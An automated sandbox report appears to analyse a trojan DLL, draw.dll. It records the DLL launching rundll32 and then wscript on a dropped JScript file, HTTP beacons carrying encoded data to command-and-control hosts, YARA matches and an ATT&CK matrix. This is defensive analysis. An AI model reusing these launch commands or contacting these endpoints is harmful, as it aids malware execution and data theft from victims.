                    Source: wscript.exe, 00000010.00000002.769718218.00000000051A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769249439.00000000007E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msnbot-207-46-194-33.search.msn.com/rpc.aspx?winrm=2387&view2=classic&regclid=Y2p5b3ExT05YQF9
                    Source: wscript.exe, 0000000C.00000002.769105699.0000000000841000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753900638.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769313214.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753950766.0000000000849000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769679607.00000000051D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msnbot-207-46-194-33.search.msn.com/rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJ
                    Source: wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://msnbot-207-46-194-33.search.msn.com5
                    Source: wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.drString found in binary or memory: http://organicgreensfl.com
                    Source: wscript.exe, 0000000C.00000002.769378758.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://organicgreensfl.com/
                    Source: wscript.exe, 0000000C.00000002.769056047.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://organicgreensfl.com/he
                    Source: wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769499595.0000000004B31000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769524971.0000000004BB1000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://organicgreensfl.com/rpc.aspx?winrm=2387&view2=classic&regclid=
                    Source: wscript.exe, 00000010.00000002.769718218.00000000051A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://organicgreensfl.com/rpc.aspx?winrm=2387&view2=classic&regclid=YWh7bXMzTUxaQl1GWSQ%2BOD9dPj44M
                    Source: wscript.exe, 0000000C.00000002.769679607.00000000051D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://organicgreensfl.com/rpc.aspx?winrm=2387&view2=classic&regclid=b2Z1Y309Q0JUTFNIVyowNjFTMDA2PUN
                    Source: wscript.exe, 00000010.00000003.615182215.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.614982319.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769197728.00000000007CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                    Source: wscript.exe, 0000000C.00000003.615132442.000000000085F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.615659227.0000000000878000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com2=classic&regclid=YGl6bHIyTE1bQ1xHWCU%2FOT5cPz85MkxNW0NcR1glPzk%2BXD8%2FOTJuaW
                    Source: unknownDNS traffic detected: queries for: msnbot-207-46-194-33.search.msn.com
                    Source: global trafficHTTP traffic detected: GET /rpc.aspx?winrm=2387&view2=classic&regclid=bGV2YH4%2BQEFXT1BLVCkzNTJQMzM1PkBBV09QS1QpMzUyUDMzNT5iZWh3YT42MmE3Yjc3Nj5pZWA2PT43Nj4wNz03&client=ixxppezciktqtwhxserbxnujcbfpqcn&service_id=FE04120&ubwG=tzuqeqskfsnk HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: knockoutlights.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJJVisxNzBSMTE3PEJDVU1SSVYrMTcwUjExNzxgZ2p1Yzw0MGM1YDU1NDxrZ2I0Pzw1NDwyNT81&client=tarbneghyrdfwglztdpcknpjvzxbxtm&service_id=FE05211&ubwG=payxcvavvogx HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: knockoutlights.comConnection: Keep-Alive

                    System Summary

                    barindex
                    Source: 4.3.rundll32.exe.334a950.0.unpack, type: UNPACKEDPEMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: 0.3.loaddll32.exe.b0a950.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: 4.3.rundll32.exe.334a950.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: 3.3.rundll32.exe.119a950.0.unpack, type: UNPACKEDPEMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: 3.3.rundll32.exe.119a950.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: 0.3.loaddll32.exe.b0a950.0.unpack, type: UNPACKEDPEMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: 00000003.00000003.535269013.0000000001190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: Process Memory Space: loaddll32.exe PID: 5220, type: MEMORYSTRMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: Process Memory Space: rundll32.exe PID: 6128, type: MEMORYSTRMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: Process Memory Space: wscript.exe PID: 3680, type: MEMORYSTRMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: Process Memory Space: wscript.exe PID: 4252, type: MEMORYSTRMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: C:\Users\Public\iVIwVADQD.eLxan, type: DROPPEDMatched rule: Detects JS potentially executing WMI queries Author: ditekSHen
                    Source: draw.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                    Source: 4.3.rundll32.exe.334a950.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: 0.3.loaddll32.exe.b0a950.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: 4.3.rundll32.exe.334a950.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: 3.3.rundll32.exe.119a950.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: 3.3.rundll32.exe.119a950.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: 0.3.loaddll32.exe.b0a950.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: 00000003.00000003.535269013.0000000001190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: Process Memory Space: loaddll32.exe PID: 5220, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: Process Memory Space: rundll32.exe PID: 6128, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: Process Memory Space: wscript.exe PID: 3680, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: Process Memory Space: wscript.exe PID: 4252, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: C:\Users\Public\iVIwVADQD.eLxan, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
                    Source: draw.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: draw.dllReversingLabs: Detection: 82%
                    Source: draw.dllVirustotal: Detection: 75%
                    Source: draw.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\draw.dll,Productword9
                    Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\draw.dll"
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\draw.dll",#1
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\draw.dll,Productword9
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\draw.dll",#1
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript.exe //E:jscript "C:\Users\Public\iVIwVADQD.eLxan
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript.exe //E:jscript "C:\Users\Public\iVIwVADQD.eLxan
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\draw.dll",#1
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\draw.dll,Productword9
                    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript.exe //E:jscript "C:\Users\Public\iVIwVADQD.eLxan
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\draw.dll",#1
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript.exe //E:jscript "C:\Users\Public\iVIwVADQD.eLxan
                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5140:120:WilError_01
                    Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\Public\iVIwVADQD.eLxanJump to behavior
                    Source: classification engineClassification label: mal100.troj.evad.winDLL@12/1@10/1
                    Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: draw.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: kbdusm.pdb source: loaddll32.exe, 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: c:\Month\ago\written\Weight\Root\vowel\FatOrder.pdb source: draw.dll
                    Source: Binary string: Wkbdusm.pdb source: loaddll32.exe, 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp
                    Source: draw.dllStatic PE information: real checksum: 0x59f56 should be: 0x4d8e1
                    Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04E9B9CD push ecx; ret
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000
                    Source: wscript.exe, 0000000C.00000003.615132442.000000000085F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWKD
                    Source: wscript.exe, 00000010.00000003.614982319.00000000007B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                    Source: wscript.exe, 0000000C.00000003.617698980.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753900638.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769313214.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.615015521.00000000007E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.615322654.00000000007E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769249439.00000000007E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: wscript.exe, 0000000C.00000003.615132442.000000000085F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPb
                    Source: wscript.exe, 00000010.00000003.614982319.00000000007B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                    Source: C:\Windows\SysWOW64\wscript.exeCode function: 12_2_04E9F081 LdrInitializeThunk,

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Windows\SysWOW64\wscript.exeDomain query: ec.atdmt.com
                    Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 207.148.248.143 80
                    Source: C:\Windows\SysWOW64\wscript.exeDomain query: a-zcorner.com
                    Source: C:\Windows\SysWOW64\wscript.exeDomain query: msnbot-207-46-194-33.search.msn.com
                    Source: C:\Windows\SysWOW64\wscript.exeDomain query: knockoutlights.com
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\draw.dll",#1
                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 4.3.rundll32.exe.334a950.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.loaddll32.exe.b0a950.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.3.rundll32.exe.334a950.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.3.rundll32.exe.119a950.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.3.rundll32.exe.119a950.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.loaddll32.exe.b0a950.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.535269013.0000000001190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.769445270.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.663643714.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.768676273.0000000000708000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.768788534.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5220, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 3680, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 4252, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\Public\iVIwVADQD.eLxan, type: DROPPED

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 4.3.rundll32.exe.334a950.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.loaddll32.exe.b0a950.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.3.rundll32.exe.334a950.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.3.rundll32.exe.119a950.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.3.rundll32.exe.119a950.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.loaddll32.exe.b0a950.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.535269013.0000000001190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.769445270.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.663643714.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.768676273.0000000000708000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.768788534.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5220, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 3680, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 4252, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\Public\iVIwVADQD.eLxan, type: DROPPED

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts1
                    Scripting                    		Path Interception111
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping1
                    Security Software Discovery                    		Remote ServicesData from Local SystemExfiltration Over Other Network Medium3
                    Ingress Tool Transfer                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                    Virtualization/Sandbox Evasion                    		LSASS Memory1
                    Virtualization/Sandbox Evasion                    		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
                    Non-Application Layer Protocol                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)111
                    Process Injection                    		Security Account Manager1
                    Remote System Discovery                    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration13
                    Application Layer Protocol                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                    Scripting                    		NTDS2
                    System Information Discovery                    		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Obfuscated Files or Information                    		LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Rundll32                    		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    Software Packing                    		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
